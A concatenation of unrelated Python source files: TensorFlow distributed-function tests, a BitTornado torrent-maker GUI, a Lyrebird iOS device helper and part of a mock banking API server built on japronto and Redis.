self._coord.join(threads)
for result in t1_results + t2_results:
np.testing.assert_array_equal([[2, 2], [2, 2]], result)
@test_util.run_in_async_and_sync_mode
def testDistributedFunctionServerAdded(self):
"""Add a server to cluster, and run distributed function on it."""
with ops.device(self.device_t1):
x1 = array_ops.ones([2, 2])
@def_function.function
def worker_fn(i):
with ops.device(self.device_t2):
mul = math_ops.matmul(i, i)
return mul - array_ops.zeros_like(mul)
# Forces function tracing and registration
worker_fn.get_concrete_function(x1)
context.update_server_def(server_def=self.server_def_s1_s2_s3)
with ops.device(self.device_t3):
y = worker_fn(x1)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
@test_util.run_in_async_and_sync_mode
def testDistributedFunctionServerRemovedAddedBack(self):
"""Add then remove a server, and run distributed function on cluster."""
with ops.device(self.device_local):
x1 = array_ops.ones([2, 2])
@def_function.function
def worker_fn(i):
with ops.device(self.device_t1):
mul = math_ops.matmul(i, i)
return mul - array_ops.zeros_like(mul)
# Forces function tracing and registration
worker_fn.get_concrete_function(x1)
context.update_server_def(server_def=self.server_def_s1)
with ops.device(self.device_t1):
y = worker_fn(x1)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
context.update_server_def(server_def=self.server_def_s1_s2)
with ops.device(self.device_t2):
y = worker_fn(x1)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
@test_util.run_in_async_and_sync_mode
def testDistributedFunctionBothServersReplaced(self):
"""Tests that replacing servers works correctly.
We create two servers, t1 and t2. We first replace t2, then we replace t1.
Among other things, this ensures that both already existing, and
restarted workers have the context view IDs correctly updated.
"""
with ops.device(self.device_local):
x1 = array_ops.ones([2, 2])
@def_function.function
def worker_fn(i):
with ops.device(self.device_t1):
mul = math_ops.matmul(i, i)
with ops.device(self.device_t2):
add = mul + i
return add - i
# Forces function tracing and registration
worker_fn.get_concrete_function(x1)
# Replace task2
context.update_server_def(server_def=self.server_def_s1_s3)
for device in (self.device_t1, self.device_t2):
with ops.device(device):
y = worker_fn(x1)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
# Then replace task1
context.update_server_def(server_def=self.server_def_s4_s3)
for device in (self.device_t1, self.device_t2):
with ops.device(device):
y = worker_fn(x1)
np.testing.assert_array_equal([[2, 2], [2, 2]], y.numpy())
def testDistributedFunctionPendingNodesServerReplaced(self):
with ops.device(self.device_local):
x1 = array_ops.ones([2, 2])
@def_function.function
def worker_fn(i):
with ops.device(self.device_t1):
mul = math_ops.matmul(i, i)
with ops.device(self.device_t2):
add = mul + i
return add - i
worker_fn.get_concrete_function(x1)
num_calls = 10
self._coord = coordinator.Coordinator()
def thread_fn(device, results):
with self._coord.stop_on_exception():
for i in range(num_calls):
with ops.device(device):
y = worker_fn(x1)
results[i] = y.numpy()
def update_server_def_fn():
with self._coord.stop_on_exception():
for i in range(num_calls):
context.update_server_def(
server_def=(self.server_def_s1_s2_s3 if i %
2 == 0 else self.server_def_s1_s2))
results = [None] * num_calls
threads = []
threads.append(
threading.Thread(target=thread_fn, args=(self.device_t1, results)))
threads.append(threading.Thread(target=update_server_def_fn))
for t in threads:
t.start()
self._coord.join(threads)
for result in results:
np.testing.assert_array_equal([[2, 2], [2, 2]], result)
def testParameterServerMultiExecutors(self):
context.update_server_def(server_def=self.server_def_s1_s2_s3_s4)
with ops.device(self.device_t1):
v1 = variables.Variable(initial_value=0.)
with ops.device(self.device_t2):
v2 = variables.Variable(initial_value=10.)
@def_function.function
def worker_fn():
x1 = v1.read_value()
x2 = v2.read_value()
grad = (x1 + x2) * 0.1
v1.assign_add(grad)
v2.assign_sub(grad)
return v1 + v2
worker_fn.get_concrete_function()
executor_t3 = executor.new_executor(enable_async=False)
executor_t4 = executor.new_executor(enable_async=False)
num_calls = 10
self._coord = coordinator.Coordinator()
def thread_fn(executor_obj, device, results):
with self._coord.stop_on_exception():
for i in range(num_calls):
with context.executor_scope(executor_obj):
with ops.device(device):
results[i] = worker_fn()
def update_server_def_fn():
with self._coord.stop_on_exception():
for _ in range(30):
context.update_server_def(self.server_def_s1_s2_s3_s4)
t3_results = [None] * num_calls
t4_results = [None] * num_calls
threads = []
threads.append(
threading.Thread(
target=thread_fn, args=(executor_t3, self.device_t3, t3_results)))
threads.append(
threading.Thread(
target=thread_fn, args=(executor_t4, self.device_t4, t4_results)))
threads.append(threading.Thread(target=update_server_def_fn))
for t in threads:
t.start()
self._coord.join(threads)
# Cannot assert individual values since the results are non-deterministic.
# By summing up the value we ensure that there are all reasonable and valid
# numbers (not `None` or `NaN`).
total = np.sum(t3_results + t4_results)
self.assertGreater(total, 0)
def testCheckAlive(self):
with self.assertRaisesRegex(ValueError, "Context is not initialized."):
context.check_alive("/job:remote_device/task:0")
context.context().ensure_initialized()
self.assertTrue(context.check_alive("/job:remote_device/replica:0/task:0"))
self.assertTrue(context.check_alive("/job:remote_device/replica:0/task:1"))
with self.assertRaisesRegex(errors.InvalidArgumentError,
"Unable to find worker interface"):
context.check_alive("/job:remote_device/replica:0/task:10")
if __name__ == "__main__":
ops.enable_eager_execution()
test.main()
|
btcompletedirgui.py | #!/usr/bin/env python
# Written by Bram Cohen
# see LICENSE.txt for license information
from BitTornado import PSYCO
if PSYCO.psyco:
try:
import psyco
assert psyco.__version__ >= 0x010100f0
psyco.full()
except:
pass
from sys import argv, version
assert version >= '2', "Install Python 2.0 or greater"
from BitTornado.BT1.makemetafile import completedir,completedir_recursion
from threading import Event, Thread
import sys
from os import getcwd,makedirs
from os.path import join,sep,exists
try:
from wxPython.wx import *
except:
print 'wxPython is either not installed or has not been installed properly.'
sys.exit(1)
try:
True
except:
True = 1
False = 0
wxEVT_INVOKE = wxNewEventType()
def EVT_INVOKE(win, func):
win.Connect(-1, -1, wxEVT_INVOKE, func)
class InvokeEvent(wxPyEvent):
def __init__(self, func, args, kwargs):
wxPyEvent.__init__(self)
self.SetEventType(wxEVT_INVOKE)
self.func = func
self.args = args
self.kwargs = kwargs
class DownloadInfo:
def __init__(self):
frame = wxFrame(None, -1, 'BitTorrent complete dir 1.0.1', size = wxSize(550, 250))
self.frame = frame
panel = wxPanel(frame, -1)
gridSizer = wxFlexGridSizer(cols = 2, rows = 2, vgap = 15, hgap = 8)
gridSizer.Add(wxStaticText(panel, -1, 'directory to build:'))
self.dirCtl = wxTextCtrl(panel, -1, '')
b = wxBoxSizer(wxHORIZONTAL)
b.Add(self.dirCtl, 1, wxEXPAND)
# b.Add(10, 10, 0, wxEXPAND)
button = wxButton(panel, -1, 'select')
b.Add(button, 0, wxEXPAND)
EVT_BUTTON(frame, button.GetId(), self.select)
gridSizer.Add(b, 0, wxEXPAND)
gridSizer.Add(wxStaticText(panel, -1, 'announce url:'))
self.annCtl = wxTextCtrl(panel, -1, '')
gridSizer.Add(self.annCtl, 0, wxEXPAND)
gridSizer.Add(wxStaticText(panel, -1, 'piece size:'))
self.piece_length = wxChoice(panel, -1, choices = ['2 ** 21', '2 ** 20', '2 ** 19',
'2 ** 18', '2 ** 17', '2 ** 16', '2 ** 15'])
self.piece_length.SetSelection(3)
gridSizer.Add(self.piece_length)
gridSizer.AddGrowableCol(1)
border = wxBoxSizer(wxVERTICAL)
border.Add(gridSizer, 0, wxEXPAND | wxNORTH | wxEAST | wxWEST, 25)
b2 = wxButton(panel, -1, 'make')
# border.Add(10, 10, 1, wxEXPAND)
border.Add(b2, 0, wxALIGN_CENTER | wxSOUTH, 20)
EVT_BUTTON(frame, b2.GetId(), self.complete)
panel.SetSizer(border)
panel.SetAutoLayout(True)
def select(self, x):
dl = wxDirDialog(self.frame, style = wxDD_DEFAULT_STYLE | wxDD_NEW_DIR_BUTTON)
if dl.ShowModal() == wxID_OK:
self.dirCtl.SetValue(dl.GetPath())
def complete(self, x):
if self.dirCtl.GetValue() == '':
dlg = wxMessageDialog(self.frame, message = 'You must select a directory',
caption = 'Error', style = wxOK | wxICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
return
try:
ps = 21 - self.piece_length.GetSelection()
CompleteDir(self.dirCtl.GetValue(), self.annCtl.GetValue(), ps)
except:
print_exc()
from traceback import print_exc
class CompleteDir:
def __init__(self, d, a, pl):
self.d = d
self.a = a
self.pl = pl
self.flag = Event()
frame = wxFrame(None, -1, 'BitTorrent make directory', size = wxSize(550, 250))
self.frame = frame
panel = wxPanel(frame, -1)
gridSizer = wxFlexGridSizer(cols = 1, vgap = 15, hgap = 8)
self.currentLabel = wxStaticText(panel, -1, 'checking file sizes')
gridSizer.Add(self.currentLabel, 0, wxEXPAND)
self.gauge = wxGauge(panel, -1, range = 1000, style = wxGA_SMOOTH)
gridSizer.Add(self.gauge, 0, wxEXPAND)
#gridSizer.Add(10, 10, 1, wxEXPAND)
self.button = wxButton(panel, -1, 'cancel')
gridSizer.Add(self.button, 0, wxALIGN_CENTER)
gridSizer.AddGrowableRow(2)
gridSizer.AddGrowableCol(0)
g2 = wxFlexGridSizer(cols = 1, vgap = 15, hgap = 8)
g2.Add(gridSizer, 1, wxEXPAND | wxALL, 25)
g2.AddGrowableRow(0)
g2.AddGrowableCol(0)
panel.SetSizer(g2)
panel.SetAutoLayout(True)
EVT_BUTTON(frame, self.button.GetId(), self.done)
EVT_CLOSE(frame, self.done)
EVT_INVOKE(frame, self.onInvoke)
frame.Show(True)
Thread(target = self.complete).start()
def complete(self):
params = {'piece_size_pow2': self.pl}
self.dst_dir = params['target'] = self.d + sep + 'torrents'
if not exists(params['target']):
makedirs(params['target'])
#wxMessageBox( params['target'], 'Title', wxOK)
try:
lists = completedir_recursion(self.d, self.a, params, self.flag, self.valcallback, self.filecallback)
listname = join(self.dst_dir,"downlist.txt")
listfile = open(listname,'w')
listfile.write(lists.encode('utf-8'))
listfile.close()
if not self.flag.isSet():
self.currentLabel.SetLabel('Done!')
self.gauge.SetValue(1000)
self.button.SetLabel('Close')
except (OSError, IOError), e:
self.currentLabel.SetLabel('Error!')
self.button.SetLabel('Close')
dlg = wxMessageDialog(self.frame, message = 'Error - ' + str(e),
caption = 'Error', style = wxOK | wxICON_ERROR)
dlg.ShowModal()
dlg.Destroy()
def valcallback(self, amount):
self.invokeLater(self.onval, [amount])
def onval(self, amount):
self.gauge.SetValue(int(amount * 1000))
def filecallback(self, f):
self.invokeLater(self.onfile, [f])
def onfile(self, f):
self.currentLabel.SetLabel('building ' + join(self.d, f) + '.torrent')
def onInvoke(self, event):
if not self.flag.isSet():
apply(event.func, event.args, event.kwargs)
def invokeLater(self, func, args = [], kwargs = {}):
if not self.flag.isSet():
wxPostEvent(self.frame, InvokeEvent(func, args, kwargs))
def done(self, event):
self.flag.set()
self.frame.Destroy()
class btWxApp(wxApp):
def OnInit(self):
d = DownloadInfo()
d.frame.Show(True)
self.SetTopWindow(d.frame)
return True
if __name__ == '__main__':
btWxApp().MainLoop()
|
ios_helper.py | import os, plistlib, subprocess, threading, codecs, json, time
from pathlib import Path
import lyrebird
from lyrebird import context
from lyrebird.mock import logger_helper
from .helper import config
_log = logger_helper.get_logger()
ideviceinstaller = None
idevice_id = None
idevicescreenshot = None
ideviceinfo = None
idevicesyslog = None
root = os.path.dirname(__file__)
static = os.path.abspath(os.path.join(root, 'static'))
model_json = os.path.abspath(os.path.join(root, 'config/comparison_table_model.json'))
storage = lyrebird.get_plugin_storage()
tmp_dir = os.path.abspath(os.path.join(storage, 'tmp'))
crash_dir = os.path.abspath(os.path.join(storage, 'crash'))
PLUGIN_ROOT_PATH = Path('~', '.lyrebird/plugins/lyrebird_ios').expanduser()
PLIST_PATH = os.path.join(PLUGIN_ROOT_PATH, 'plist')
error_msg = None
if not os.path.exists(tmp_dir):
os.makedirs(tmp_dir)
if not os.path.exists(crash_dir):
os.makedirs(crash_dir)
class libimobiledeviceError(Exception):
pass
class ideviceinstallerError(Exception):
pass
def check_environment():
"""
检查用户环境,第三方依赖是否正确安装。
:return:
"""
global ideviceinstaller, idevice_id, idevicescreenshot, ideviceinfo, idevicesyslog, error_msg
if not os.path.exists('/usr/local/bin/ideviceinfo'):
error_msg = {"show_error": True,
"user_message": "No ideviceinfo program found, need libimobiledevice dependencies with Homebrew, See README Help Center"}
time.sleep(20)
raise libimobiledeviceError('No libimobiledevice program found, See README Help Center')
else:
p = subprocess.Popen('/usr/local/bin/ideviceinfo', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
err = p.stderr.read().decode()
if len(err):
error_msg = {"show_error": True,
"user_message": "ideviceinfo program found but not working with error -> %s, See README Help Center" % err}
time.sleep(20)
raise libimobiledeviceError('ideviceinfo program found but not working with error -> %s, See README Help Center' % err)
if not os.path.exists('/usr/local/bin/ideviceinstaller'):
error_msg = {"show_error": True,
"user_message": "No ideviceinstaller program found, need ideviceinstaller dependencies use Homebrew, See README Help Center"}
time.sleep(20)
raise ideviceinstallerError("No ideviceinstaller program found, need ideviceinstaller dependencies use Homebrew, See README Help Center")
if not os.path.exists('/usr/local/bin/idevicescreenshot'):
error_msg = {"show_error": True,
"user_message": "No idevicescreenshot program found, need libimobiledevice dependencies use Homebrew, See README Help Center"}
time.sleep(20)
raise libimobiledeviceError('No idevicescreenshot program found, See README Help Center')
idevice_id = '/usr/local/bin/idevice_id'
ideviceinstaller = '/usr/local/bin/ideviceinstaller'
ideviceinfo = '/usr/local/bin/ideviceinfo'
idevicesyslog = '/usr/local/bin/idevicesyslog'
idevicescreenshot = '/usr/local/bin/idevicescreenshot'
error_msg = {"show_error": False, "user_message": ""}
def read_plist(plist_path):
return plistlib.readPlist(plist_path)
class Apps:
"""
应用基类,属性为 plist, bundle_id,提供两个方法,获取app的列表,和获取指定app的详细信息
"""
def __init__(self):
self._plist = None
self.bundle_id = None
self.app_info = {}
@property
def plist(self):
return self._plist
@plist.setter
def plist(self, name):
plist_path = os.path.join(PLIST_PATH, name)
if os.path.exists(plist_path):
self._plist = plist_path
@property
def apps(self):
return read_plist(self.plist)
@property
def app_key(self):
conf = config.load()
if hasattr(conf, 'app_info'):
return config.load().app_info
else:
return {
"CFBundleName": "AppName",
"CFBundleIdentifier": "BundleID",
"CFBundleShortVersionString": "VersionNumber",
"CFBundleVersion": "BuildNumber"
}
def app(self, bundle_id):
for app in self.apps:
if bundle_id in app.get('CFBundleIdentifier'):
return app
def get_app_list(self):
app_list = []
for app in self.apps:
tmp = {}
tmp["app_name"] = app.get('CFBundleName')
tmp['bundle_id'] = app.get('CFBundleIdentifier')
tmp['label'] = '%s %s' % (app.get('CFBundleName'), app.get('CFBundleIdentifier'))
app_list.append(tmp)
return app_list
def get_app_info(self, bundle_id):
for k, v in self.app_key.items():
self.app_info[v] = self.app(bundle_id).get(k)
return self.app_info
class Device:
"""
设备基类,主要属性包含 device_id, model, os_version等,主要方法包括截屏,获取信息等
"""
def __init__(self, device_id):
self.device_id = device_id
self.model = None
self.is_jailbreak = None
self.phone_number = None
self.os_version = None
self.device_name = None
self.sn = None
self._log_process = None
self._log_cache = []
self._log_crash_cache = []
self._log_file = None
self._screen_shot_file = os.path.abspath(os.path.join(tmp_dir, 'android_screenshot_%s.png' % self.device_id))
self._anr_file = None
self._crash_file_list = []
self._device_info = None
self._apps_list = None
self.start_catch_log = False
self._pid = None
@property
def log_file(self):
return self._log_file
@property
def screen_shot_file(self):
return self._screen_shot_file
@property
def anr_file(self):
return self._anr_file
@property
def crash_file_list(self):
return self._crash_file_list
@classmethod
def read_line(cls, line):
res = subprocess.run(f'{ideviceinfo} -u {line}', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
lines = res.stdout.decode()
device_info = [info for info in lines.split('\n') if info]
_device = cls(line)
if len(device_info) < 2:
_log.error(f'Read device info line error. {lines}')
raise libimobiledeviceError('Failed to got device info, Please make sure \'deviceinfo\' command is working on your system.')
for info in device_info:
info_kv = info.split(':')
if info_kv[0] == 'ProductType':
_device.model = cls(line).convert_model(model=info_kv[1].strip())
if info_kv[0] == 'BrickState':
_device.is_jailbreak = info_kv[1].strip()
if info_kv[0] == 'PhoneNumber':
_device.phone_number = info_kv[1].strip()
if info_kv[0] == 'ProductVersion':
_device.os_version = info_kv[1].strip()
if info_kv[0] == 'DeviceName':
_device.device_name = info_kv[1].strip()
if info_kv[0] == 'SerialNumber':
_device.sn = info_kv[1].strip()
return _device
def convert_model(self, model):
model_dict = json.loads(codecs.open(model_json, 'r', 'utf-8').read())
return model_dict.get(model)
def start_log(self):
self.stop_log()
log_file_name = 'ios_log_%s.log' % self.device_id
self._log_file = os.path.abspath(os.path.join(tmp_dir, log_file_name))
p = subprocess.Popen(f'{idevicesyslog} -u {self.device_id}', shell=True, stdout=subprocess.PIPE)
def log_handler(logcat_process):
log_file = codecs.open(self._log_file, 'w', 'utf-8')
while True:
line = logcat_process.stdout.readline()
if not line:
context.application.socket_io.emit('log', self._log_cache, namespace='/iOS-plugin')
log_file.close()
return
# self.crash_checker(line)
# self.anr_checker(line)
self._log_cache.append(line.decode(encoding='UTF-8', errors='ignore'))
if len(self._log_cache) >= 5000:
context.application.socket_io.emit('log', self._log_cache, namespace='/iOS-plugin')
log_file.writelines(self._log_cache)
log_file.flush()
self._log_cache = []
threading.Thread(target=log_handler, args=(p,)).start()
def crash_checker(self, line):
crash_log_path = os.path.join(crash_dir, 'android_crash_%s.log' % self.device_id)
if str(line).find('FATAL EXCEPTION') > 0:
self.start_catch_log = True
self._log_crash_cache.append(str(line))
lyrebird.publish('crash', 'android', path=crash_log_path, id=self.device_id)
elif str(line).find('AndroidRuntime') > 0 and self.start_catch_log:
self._log_crash_cache.append(str(line))
else:
self.start_catch_log = False
with codecs.open(crash_log_path, 'w') as f:
f.write('\n'.join(self._log_crash_cache))
def anr_checker(self, line):
if str(line).find('ANR') > 0 and str(line).find('ActivityManager') > 0:
self.get_anr_log()
@property
def device_info(self):
if not self._device_info:
self._device_info = self.get_properties()
return self._device_info
def get_properties(self):
p = subprocess.run(f'{ideviceinfo} -u {self.device_id}', shell=True, stdout=subprocess.PIPE)
if p.returncode == 0:
return p.stdout.decode().split('\n')
def get_app_info(self, bundle_id):
self.get_device_plist(self.device_id)
apps = Apps()
apps.plist = self.device_id + '.plist'
return apps.get_app_info(bundle_id)
def get_device_plist(self, device_id):
plist_path = '%s/%s.plist' % (PLIST_PATH, self.device_id)
if not os.path.exists(PLIST_PATH):
os.mkdir(PLIST_PATH)
p = subprocess.Popen(f'{ideviceinstaller} -u {self.device_id} -l -o xml > {plist_path}', shell=True)
p.wait()
def get_apps_list(self, device_id):
self.get_device_plist(device_id)
apps = Apps()
apps.plist = self.device_id + '.plist'
return apps.get_app_list()
def stop_log(self):
if self._log_process:
self._log_process.kill()
self._log_process = None
def take_screen_shot(self):
file_name = self.device_name.replace(' ', '_')
p = subprocess.run(f'{idevicescreenshot} -u {self.device_id} {tmp_dir}/{file_name}.png', shell=True)
if p.returncode == 0:
return os.path.abspath(os.path.join(tmp_dir, '%s.png' % file_name))
else:
return False
def to_dict(self):
device_info = {k: self.__dict__[k] for k in self.__dict__ if not k.startswith('_')}
# get additional device info
prop_lines = self.device_info
if not prop_lines:
return device_info
for line in prop_lines:
# 基带版本
if 'ro.build.expect.baseband' in line:
baseband = line[line.rfind('[')+1:line.rfind(']')].strip()
device_info['baseBand'] = baseband
# 版本号
if 'ro.build.id' in line:
build_id = line[line.rfind('[') + 1:line.rfind(']')].strip()
device_info['buildId'] = build_id
# Android 版本
if 'ro.build.version.release' in line:
build_version = line[line.rfind('[') + 1:line.rfind(']')].strip()
device_info['releaseVersion'] = build_version
return device_info
def devices():
"""
devices 用于返回在线的设备示例集合
:type 字典
:return: online_devices 对象 (在线的设备)
"""
check_environment()
res = subprocess.run(f'{idevice_id} -l', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = res.stdout.decode()
err_str = res.stderr.decode()
# 命令执行异常
if len(output) <= 0 < len(err_str):
print('Get devices list error', err_str)
return []
lines = [line for line in output.split('\n') if line]
online_devices = {}
if len(lines) == 0:
return online_devices
for line in lines:
device = Device.read_line(line)
online_devices[device.device_id] = device
return online_devices
|
server_japronto_oauth2.py | import os
import sys
import random
import ujson
import uuid
import uvloop
import asyncio
import asyncio_redis
import calendar
try:
sys.path.append(os.path.abspath('./'))
except Exception as e:
print(str(e.args))
exit(1)
from datetime import datetime, timedelta
from multiprocessing import Process, Queue
from japronto import Application
from decimal import *
uvloop.install()
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
asyncio.set_event_loop(uvloop.new_event_loop())
CUSTOMERS = []
ACCOUNTS = []
CREDIT_CARDS = []
MOVEMENTS = []
TRANSACTIONS = []
lists = {
"accounts": ACCOUNTS,
"credit_cards": CREDIT_CARDS,
"customers": CUSTOMERS,
"movements": MOVEMENTS,
"transactions": TRANSACTIONS
}
json_attributes = [
'origin',
'target',
'type',
'number',
'customer_id',
'id',
'account',
'account_id',
'alias',
'brand',
'transaction_id'
]
port = int(os.getenv('PORT', 8080))
redis_params = {
'host': os.getenv('REDIS_SERVER', '127.0.0.1'),
'port': int(os.getenv('REDIS_PORT', 6379)),
'password': os.getenv('REDIS_PASSWORD'),
'poolsize': int(os.getenv('REDIS_POOL', 7))
}
delete_query_strings = [
"apikey",
"secret",
"secretid",
"cientid",
"api-key",
"secret-id",
"client_id",
"code",
"error"
]
conn = None
queue = Queue()
app = Application()
rt = app.router
def add_months(source_date, months):
month = source_date.month - 1 + months
year = source_date.year + month // 12
month = month % 12 + 1
day = min(source_date.day, calendar.monthrange(year, month)[1])
return datetime(year, month, day)
def serialize(process_queue):
async def redis_serialize(p_queue):
async def push(key, items):
values = [ujson.dumps(item) for item in items]
if len(values) > 0:
await redis_conn.rpush(key, values)
redis_conn = await asyncio_redis.Pool.create(**redis_params)
while True:
obj = ujson.loads(p_queue.get())
keys = [i.lower() for i in obj["data"]]
if len(keys) > 0:
await redis_conn.delete(keys)
tasks = []
for k, v in lists.items():
if k in keys:
tasks.append(push(k, v))
await asyncio.gather(*tasks)
try:
import concurrent
import selectors
import asyncio
import asyncio_redis
import ujson
executor = concurrent.futures.ThreadPoolExecutor()
selector = selectors.SelectSelector()
loop = asyncio.SelectorEventLoop(selector)
loop.set_default_executor(executor)
asyncio.set_event_loop(loop)
asyncio.ensure_future(redis_serialize(process_queue))
loop.run_forever()
except Exception as exception:
print(str(exception.args))
exit(1)
def handle_response(request, response, code, message, make_json=True):
response['response']['code'] = code
response['response']['message'] = message
return request.Response(json=response) if make_json else response
def generic(product, error_message, request, make_json=True, condition='OR'):
message = dict(response=dict(code=1, message="Something is wrong."))
try:
if request.method == 'GET':
args = {}
pre_args = request.query
for k, v in pre_args.items():
if k not in delete_query_strings:
args[k] = v
for item in product:
if 'brand' in item:
today = datetime.today()
court_date = datetime(
today.year,
today.month,
item['court_date']
)
if court_date > datetime(today.year, today.month, 1):
next_payment_day = \
datetime(
today.year,
today.month,
item['court_date']
) + timedelta(days=15)
else:
if today.month < 12:
next_payment_day = \
datetime(
today.year,
today.month + 1,
item['court_date']
) + timedelta(days=15)
else:
next_payment_day = \
datetime(
today.year + 1,
1,
item['court_date']
) + timedelta(days=15)
item['next_payment_day'] = next_payment_day
item['next_payment_day'] = item['next_payment_day'].strftime("%m/%d/%Y")
if not args:
return handle_response(request, message, 0, product, make_json)
else:
content = error_message
for k, v in args.items():
if k in json_attributes:
content = []
for item in product:
if v in [
item[attribute] if attribute in item else ''
for attribute in json_attributes
]:
content.append(item)
if condition == 'AND':
for k, v in args.items():
counter = len(content)
i = 0
while i < counter:
if content[i][k] != v:
content.remove(content[i])
counter -= 1
else:
i += 1
return handle_response(request, message, 0, content, make_json)
else:
return handle_response(request, message, 2, "Method Not Allowed", make_json)
except Exception as exception:
message['response']['error'] = str(exception.args)
return request.Response(json=message) if make_json else message
def debit(transaction):
global MOVEMENTS
result = 0
before = 0
successful = False
if transaction['origin_type'] == 'ACCOUNTS':
for a in ACCOUNTS:
available_balance = Decimal(a['available_balance'])
if a['number'] == transaction['origin'] and \
available_balance > transaction['amount'] and \
a['type'] != 'loan':
before = a['available_balance']
result = available_balance - transaction['amount']
a['available_balance'] = '{0:.2f}'.format(result)
successful = True
break
elif transaction['origin_type'] == 'CREDIT_CARDS':
for a in CREDIT_CARDS:
available_quota = Decimal(a['available_quota'])
if a['number'] == transaction['origin'] and \
available_quota > transaction['amount']:
before = a['available_quota']
result = available_quota - transaction['amount']
a['available_quota'] = '{0:.2f}'.format(result)
successful = True
break
if successful:
MOVEMENTS.append(
{
"transaction_id": transaction["id"],
"date": transaction["date"],
"account": transaction["origin"],
"amount": str(transaction["amount"]),
"description": transaction["description"],
"before": before,
"after": '{0:.2f}'.format(result),
"type": "DEBIT" if transaction["amount"] > 0 else "CREDIT"
}
)
return successful
def accredit(transaction):
global MOVEMENTS
result = 0
before = 0
successful = False
if transaction['target_type'] == 'ACCOUNTS':
for a in ACCOUNTS:
if a['number'] == transaction['target']:
before = a['available_balance']
if a['type'] == 'savings':
result = Decimal(a['available_balance']) + transaction['amount']
elif a['type'] == 'loan':
result = Decimal(a['available_balance']) - transaction['amount']
a['available_balance'] = '{0:.2f}'.format(result)
successful = True
break
elif transaction['target_type'] == 'CREDIT_CARDS':
for a in CREDIT_CARDS:
if a['number'] == transaction['target']:
before = a['available_quota']
result = Decimal(a['available_quota']) + transaction['amount']
a['available_quota'] = '{0:.2f}'.format(result)
successful = True
break
if successful:
MOVEMENTS.append(
{
"transaction_id": transaction["id"],
"date": transaction["date"],
"account": transaction["target"],
"amount": str(transaction["amount"]),
"description": transaction["description"],
"before": before,
"after": '{0:.2f}'.format(result),
"type": "CREDIT"
}
)
return successful
async def transfers(request):
global TRANSACTIONS
message = dict(
response=dict(
code=1,
message="Sorry, your transaction can't be completed!"
)
)
try:
successful = False
if request.method == 'POST':
input_body = request.json
transaction = {
"id": str(uuid.uuid4()),
"date": datetime.now().strftime("%m/%d/%Y, %H:%M:%S"),
"type": input_body['type'],
"origin": input_body['origin'],
"origin_type": input_body['origin_type'],
"target": input_body['target'],
"target_type": input_body['target_type'],
"description": input_body['description'],
"amount": Decimal(input_body['amount'])
}
if input_body['type'] == 'FOUNDS_TRANSFER':
if debit(transaction):
if accredit(transaction):
successful = True
else:
transaction['amount'] *= -1
debit(transaction)
elif input_body["type"] == "DEBIT":
successful = debit(transaction)
elif input_body["type"] == "CREDIT":
successful = accredit(transaction)
if successful:
transaction["amount"] = str(transaction["amount"])
TRANSACTIONS.append(transaction)
data = {
"data": ['ACCOUNTS', 'CREDIT_CARDS', 'MOVEMENTS', 'TRANSACTIONS'],
"lists": lists
}
queue.put(ujson.dumps(data))
return handle_response(request, message, 0, "Transaction completed successfully!")
else:
return handle_response(request, message, 0, "Sorry, your transaction can't be completed!")
else:
return handle_response(request, message, 2, "Method Not Allowed")
except Exception as exception:
return handle_response(
request,
message,
1,
"Sorry, your data is wrong. %s" % str(exception.args)
)
def credit_cards_statement(request):
global CREDIT_CARDS
global MOVEMENTS
current_credit_card_movements = []
message = dict(response=dict(code=1, message="Not enough arguments."))
args = request.query
try:
if len(args) > 0 and ('number' in args or ('brand' in args and 'customer_id' in args)):
response = generic(
CREDIT_CARDS,
'Wrong Credit Card Number',
request,
False,
'AND'
)['response']
if response['code'] == 0 and len(response['message']) > 0:
credit_card = response['message'][0]
request.query["account"] = credit_card['number']
del request.query["brand"]
credit_card_movements = generic(
MOVEMENTS,
'Wrong Credit Card Number',
request,
False
)['response']['message']
next_court_day = datetime.strptime(
credit_card['next_payment_day'],
"%m/%d/%Y"
) - timedelta(days=15)
last_court_day = add_months(next_court_day, -1)
total_to_payment = Decimal("0.0")
for movement in credit_card_movements:
movement_date = datetime.strptime(movement['date'].split(',')[0], "%m/%d/%Y")
if last_court_day < movement_date < next_court_day:
current_credit_card_movements.append(movement)
if movement['type'] == 'DEBIT':
total_to_payment += Decimal(movement['amount'])
elif movement['type'] == 'CREDIT':
total_to_payment -= Decimal(movement['amount'])
return handle_response(
request,
message,
0,
{
"credit_card": credit_card["obfuscated"],
"last_court_day": last_court_day.strftime("%m/%d/%Y"),
"next_court_day": next_court_day.strftime("%m/%d/%Y"),
"total_to_payment": str(total_to_payment),
"next_payment_day": credit_card["next_payment_day"],
"movements": current_credit_card_movements
}
)
else:
return handle_response(request, message, 1, 'Not enough arguments.')
except Exception as e:
return handle_response(
request,
message,
1,
"Sorry, your data is wrong. %s" % str(e.args)
)
async def fill(request):
global lists
message = dict(response=dict(code=1, message="Something is wrong."))
try:
if request.method == 'GET':
if len(lists['accounts']) == 0:
for customer in lists['customers']:
if int(customer["id"]) % 2 != 0:
loan_account = {
"customer_id": customer["id"],
"number": str(random.randint(100000, 200000)),
"available_balance": '10000.00',
"alias": 'Crédito',
"type": "loan"
}
loan_account["obfuscated"] = ''.join(
[
'XXXX',
loan_account["number"][-2:]
]
)
lists['accounts'].append(loan_account)
last_code = str(random.randint(5000, 6000))
credit_card = {
"customer_id": customer["id"],
"number": '-'.join(
[
'4118',
str(random.randint(7000, 8000)),
str(random.randint(3000, 4000)),
last_code
]
),
"obfuscated": ''.join(['4118-XXXX-XXXX-', last_code]),
"brand": "Visa Titanium",
"alias": 'Tarjeta de Crédito',
"available_quota": '3000.00',
"court_date": 1
}
lists['credit_cards'].append(credit_card)
deposit_account = {
"customer_id": customer["id"],
"number": str(random.randint(100000, 200000)),
"available_balance": '1000.00',
"alias": 'Ahorros',
"type": "savings"
}
deposit_account["obfuscated"] = ''.join(
[
'XXXX',
deposit_account["number"][-2:]
]
)
lists['accounts'].append(deposit_account)
last_code = str(random.randint(5000, 6000))
credit_card = {
"customer_id": customer["id"],
"number": '-'.join(
[
'3608',
str(random.randint(670200, 880200)),
last_code
]
),
"obfuscated": ''.join(['3608-XXXXXX-', last_code]),
"brand": "Diners Club",
